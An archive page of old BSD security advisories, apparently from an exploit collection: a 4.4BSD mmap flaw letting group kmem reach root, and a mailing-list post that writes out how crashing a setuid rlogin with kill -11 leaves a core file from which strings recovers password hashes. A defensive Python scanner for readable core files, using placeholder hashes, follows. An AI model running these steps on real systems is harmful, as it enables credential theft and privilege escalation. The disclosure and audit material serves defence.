A 4.4BSD problem allows a read-only descriptor to a char device to be mmap()ed in RW mode. This can allow group kmem to become root and root to lower the system secure-level.
Theo de Raadt and Chuck Cranor
User in group kmem -> root -> modify secure-level -> delete audit trail and load evil kernel mods.
OpenBSD 2.2 and below, FreeBSD 2.2.5 and below, BSDI 3.0 and NetBSD.
17 February 1996 for this posting
---------- Forwarded message ----------
If the following is already known, my deepest apologies for the junk mail..
RECONSTRUCT PARTS OF UN-SHADOWED PASSWORDFILE ON (at least) FreeBSD
Bronc Buster wrote:
>This exploit is very similar to the FTP exploit on BSD that creates a
>ftp.core file you can then strings and get the encrypted password file.
I tried this technique on my FreeBSD 2.1.0 box. It didn't work. I started
playing around with dump files:
~> rlogin 127.0.0.1
Last login: Mon Feb 17 00:35:49 from localhost
Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
The Regents of the University of California. All rights reserved.
FreeBSD 2.1.0-RELEASE (WIPS) #0: Thu Oct 17 03:37:25 SAT 1996
You have new mail.
~> ps -ax | grep rlogin
6528 ?? S 0:00.06 rlogind
6527 p1 S+ 0:00.05 rlogin 127.0.0.1
6529 p1 S+ 0:00.01 rlogin 127.0.0.1
~> kill -11 6529
~> ls
Brain_Box NS cronjobs mail security
Mail News foon rlogin.core
~> strings rlogin.core > unshadowed.passwdfile.reconstruct
I also tried this on a FreeBSD 2.1.5 box, and it did the same thing. I
wonder if there is a way to make a core dump only readable by root, and why
this isn't the default?
Roelof W Temmingh Network & Data Security
firstname.lastname@example.org [w] South-Africa
email@example.com [ah] http://www.nanoteq.com
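The post's closing question is really an audit question: which core files on the box are readable by users other than root, and do any of them contain master.passwd records with live hashes? The script below is an added example written for this archive page, not part of the original mail; it constructs its own fake rlogin.core (with placeholder hashes, not real credentials), walks a directory tree the way 4.4BSD names core files (progname.core), pulls out printable runs the way strings(1) does, and reports every account whose hash shows up in a core file that group or world can read.

```python
import os
import re
import stat
import tempfile

# Printable ASCII runs of at least four bytes: the same heuristic strings(1) uses.
_PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{4,}")

# One master.passwd record as it sits in a process's memory:
#   name:hash:uid:gid:class:change:expire:gecos:home:shell
# The hash field is a 13-char DES string or an MD5-crypt "$1$salt$..." string.
# A '*' (or empty) hash slot carries nothing useful, so such lines are ignored.
_HASH_RECORD = re.compile(
    rb"^(?P<user>[A-Za-z_][A-Za-z0-9_-]*):"
    rb"(?P<hash>\$1\$[./0-9A-Za-z]{1,8}\$[./0-9A-Za-z]{22}|[./0-9A-Za-z]{13}):"
    rb"(?P<uid>\d+):(?P<gid>\d+):"
)


def printable_strings(data: bytes):
    """Yield printable runs from raw file contents (what `strings core` prints)."""
    for m in _PRINTABLE_RUN.finditer(data):
        yield m.group(0)


def leaked_hash_users(data: bytes):
    """Return, in order of appearance, the usernames whose hashes appear in data."""
    users = []
    for run in printable_strings(data):
        m = _HASH_RECORD.match(run)
        if m:
            user = m.group("user").decode("ascii")
            if user not in users:
                users.append(user)
    return users


def core_exposure(path: str):
    """Describe one core file: its permission bits and the accounts it leaks."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    with open(path, "rb") as f:
        data = f.read()
    return {
        "path": path,
        "mode": mode,
        "readable_by_others": bool(mode & (stat.S_IRGRP | stat.S_IROTH)),
        "leaked_users": leaked_hash_users(data),
    }


def scan_for_cores(root: str):
    """Walk a tree and report every *.core file (the 4.4BSD progname.core convention)."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            if name.endswith(".core"):
                findings.append(core_exposure(os.path.join(dirpath, name)))
    return findings


def make_sample_core(dirpath: str) -> str:
    """CONSTRUCTED sample: binary junk wrapped around master.passwd lines, mimicking
    what a crashed setuid rlogin leaves behind. Hashes are placeholders."""
    des_hash = b"ab" + b"X" * 11                 # 13-char DES-style placeholder
    md5_hash = b"$1$saltsalt$" + b"Y" * 22       # MD5-crypt-style placeholder
    body = (
        b"\x7fELF\x00\x01\x02" * 8
        + b"root:" + des_hash + b":0:0::0:0:Charlie &:/root:/bin/csh\n"
        + b"\x00" * 16
        + b"roelof:" + md5_hash + b":1001:1001::0:0:Roelof:/home/roelof:/bin/sh\n"
        + b"nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/sbin/nologin\n"
        + b"\x00\xff" * 8
    )
    path = os.path.join(dirpath, "rlogin.core")
    with open(path, "wb") as f:
        f.write(body)
    os.chmod(path, 0o644)  # the mode the post implies: readable by everyone
    return path


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as d:
        make_sample_core(d)
        for finding in scan_for_cores(d):
            print(finding)
```

Run against a real tree (`scan_for_cores("/home")`, say) the findings list is what you would want in a nightly report: any entry with `readable_by_others` true and a non-empty `leaked_users` is a core file that should be removed and whose listed accounts need their passwords changed.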
This page is part of Fyodor's exploit